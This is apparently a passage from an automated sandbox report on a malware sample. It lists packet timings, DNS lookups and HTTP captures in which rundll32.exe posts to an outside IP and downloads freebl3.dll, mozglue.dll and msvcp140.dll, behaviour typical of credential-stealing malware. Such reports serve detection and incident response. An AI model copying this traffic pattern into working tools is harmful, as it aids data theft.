                                                                                                                                          Apr 28, 2021 23:00:40.363179922 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.363286018 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.363915920 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.459402084 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.461193085 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.461325884 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.564043999 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.565445900 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.657708883 CEST8050091176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.657845974 CEST5009180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.658401012 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.658569098 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.659600973 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.752643108 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.758877039 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.763474941 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.878295898 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.880898952 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.971581936 CEST8050092176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.971787930 CEST5009280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.983441114 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:40.984656096 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:40.986804008 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.089430094 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.092780113 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.092947006 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.205944061 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.208822966 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.302130938 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.302365065 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.303684950 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.308339119 CEST8050093176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.308496952 CEST5009380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.398487091 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.402677059 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.402863979 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.517940998 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.520133018 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.611232042 CEST8050095176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.611327887 CEST5009580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.618752003 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.618895054 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.619910002 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.718775034 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.722769976 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.722950935 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.835505962 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.838046074 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.934794903 CEST8050096176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.935009956 CEST5009680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.935885906 CEST8050097176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:41.936023951 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:41.937402010 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.035667896 CEST8050097176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.039381981 CEST8050097176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.039607048 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.142847061 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.144337893 CEST5009880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.240874052 CEST8050097176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.241003990 CEST5009780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.241841078 CEST8050098176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.242105961 CEST5009880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.243216991 CEST5009880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.340753078 CEST8050098176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.345041990 CEST8050098176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.345153093 CEST5009880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.385873079 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.455656052 CEST5009880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.458111048 CEST5010080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.481219053 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.481324911 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.481595039 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.554964066 CEST8050100176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.555113077 CEST5010080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.555711985 CEST5010080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.557379007 CEST8050098176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.557540894 CEST5009880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.578136921 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.578167915 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.578176022 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.578221083 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.578255892 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.578310013 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.578336954 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.651257992 CEST8050100176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.655143023 CEST8050100176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.655244112 CEST5010080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.673587084 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.673612118 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.673629045 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.673676968 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.673687935 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.673743010 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.673801899 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.673830986 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.673858881 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.673871994 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.673976898 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.767695904 CEST5010080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.770169973 CEST5010180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.770293951 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.770313978 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.770325899 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.770381927 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.770441055 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.770467997 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.770528078 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.770888090 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.770998955 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.771096945 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.771105051 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.771219015 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.771248102 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.771279097 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.771337986 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.771395922 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.771434069 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.771529913 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.863141060 CEST8050100176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.863223076 CEST5010080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.865537882 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.865566969 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.865587950 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.865607023 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.865660906 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.865787983 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.865793943 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.865816116 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.865921974 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.865922928 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.866153955 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.866274118 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.866352081 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.866566896 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.866765022 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.866785049 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.866924047 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.866950035 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.867090940 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.867168903 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.874130011 CEST8050101176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.874382019 CEST5010180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.875133991 CEST5010180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.961720943 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.961750984 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.961769104 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.966669083 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.966696978 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.966715097 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.966942072 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:42.980886936 CEST8050101176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.984954119 CEST8050101176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:42.985100031 CEST5010180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.062232971 CEST8050099176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:43.062338114 CEST5009980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.095421076 CEST5010180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.096836090 CEST5010380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.192286015 CEST8050103176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:43.192492962 CEST5010380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.193471909 CEST5010380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.200714111 CEST8050101176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:43.200895071 CEST5010180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.286984921 CEST8050103176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:43.291110039 CEST8050103176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:43.291248083 CEST5010380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.408351898 CEST5010380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.409832954 CEST5010480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.502019882 CEST8050103176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:43.502187967 CEST5010380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:43.509808064 CEST8050104176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:43.510004997 CEST5010480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:44.386447906 CEST804970972.21.91.29192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:44.386542082 CEST4970980192.168.2.472.21.91.29
                                                                                                                                          Apr 28, 2021 23:00:44.652102947 CEST804970872.21.91.29192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:44.652231932 CEST4970880192.168.2.472.21.91.29
                                                                                                                                          Apr 28, 2021 23:00:45.345371008 CEST44349691204.79.197.200192.168.2.4

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Apr 28, 2021 22:58:32.375894070 CEST6529853192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:32.390079021 CEST5912353192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:32.424838066 CEST53652988.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:32.450833082 CEST53591238.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:32.713135958 CEST5453153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:32.761893988 CEST53545318.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:32.974914074 CEST4971453192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:33.034279108 CEST53497148.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:33.285428047 CEST5802853192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:33.343190908 CEST53580288.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:34.388118029 CEST5309753192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:34.436888933 CEST53530978.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:35.154784918 CEST4925753192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:35.215430021 CEST53492578.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:35.980715990 CEST6238953192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:36.029541016 CEST53623898.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:37.174604893 CEST4991053192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:37.226296902 CEST53499108.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:38.224492073 CEST5585453192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:38.276159048 CEST53558548.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:39.452299118 CEST6454953192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:39.501717091 CEST53645498.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:40.613862991 CEST6315353192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:40.664062023 CEST53631538.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.454423904 CEST5299153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:41.517523050 CEST53529918.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.596807003 CEST5370053192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:41.645586967 CEST53537008.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.755939007 CEST5172653192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:42.807481050 CEST53517268.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.687897921 CEST5679453192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:43.736615896 CEST53567948.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:44.819022894 CEST5653453192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:44.867883921 CEST53565348.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:46.061880112 CEST5662753192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:46.121804953 CEST53566278.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:47.550266027 CEST5662153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:47.600203991 CEST53566218.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:49.327771902 CEST6311653192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:49.385149956 CEST53631168.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:50.441308975 CEST6407853192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:50.491647959 CEST53640788.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:51.385746956 CEST6480153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:51.434516907 CEST53648018.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:52.175843000 CEST6172153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:52.294008970 CEST53617218.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:53.245760918 CEST5125553192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:53.298149109 CEST53512558.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:54.874248028 CEST6152253192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:54.928544044 CEST53615228.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:56.319035053 CEST5233753192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:58:56.368007898 CEST53523378.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:08.639455080 CEST5504653192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:08.688761950 CEST53550468.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:35.007249117 CEST4961253192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:35.159555912 CEST53496128.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:35.693211079 CEST4928553192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:35.895626068 CEST53492858.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:36.301644087 CEST5060153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:36.369466066 CEST53506018.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:36.482563019 CEST6087553192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:36.634836912 CEST53608758.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:37.070276022 CEST5644853192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:37.128623009 CEST53564488.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:37.803442955 CEST5917253192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:37.860671043 CEST53591728.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:38.550354004 CEST6242053192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:38.607708931 CEST53624208.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:39.124522924 CEST6057953192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:39.174577951 CEST53605798.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:39.994003057 CEST5018353192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:40.045634985 CEST53501838.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:40.987570047 CEST6153153192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:41.046605110 CEST53615318.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:41.783890963 CEST4922853192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:41.840884924 CEST53492288.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 22:59:50.339975119 CEST5979453192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 22:59:50.400324106 CEST53597948.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:20.876178026 CEST5591653192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 23:00:20.928795099 CEST53559168.8.8.8192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:23.115866899 CEST5275253192.168.2.48.8.8.8
                                                                                                                                          Apr 28, 2021 23:00:23.183940887 CEST53527528.8.8.8192.168.2.4

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                          Apr 28, 2021 22:58:41.454423904 CEST192.168.2.48.8.8.80x8beeStandard query (0)api.faceit.comA (IP address)IN (0x0001)
                                                                                                                                          Apr 28, 2021 22:58:52.175843000 CEST192.168.2.48.8.8.80x7f0eStandard query (0)ukedocumentary.comA (IP address)IN (0x0001)

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                          Apr 28, 2021 22:58:41.517523050 CEST8.8.8.8192.168.2.40x8beeNo error (0)api.faceit.com104.17.63.50A (IP address)IN (0x0001)
                                                                                                                                          Apr 28, 2021 22:58:41.517523050 CEST8.8.8.8192.168.2.40x8beeNo error (0)api.faceit.com104.17.62.50A (IP address)IN (0x0001)
                                                                                                                                          Apr 28, 2021 22:58:52.294008970 CEST8.8.8.8192.168.2.40x7f0eNo error (0)ukedocumentary.com89.184.92.210A (IP address)IN (0x0001)

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • 78.47.81.226
                                                                                                                                          • ukedocumentary.com
                                                                                                                                          • 176.111.174.114

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          0192.168.2.44973578.47.81.22680C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:58:42.092727900 CEST1275OUTPOST /873 HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                          Content-Length: 25
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                                                                                          Data Ascii: --1BEF0A57BE110FD467A--
                                                                                                                                          Apr 28, 2021 22:58:42.251470089 CEST1279OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Apr 28, 2021 22:58:42.704437017 CEST1663OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Apr 28, 2021 22:58:42.863784075 CEST1807OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
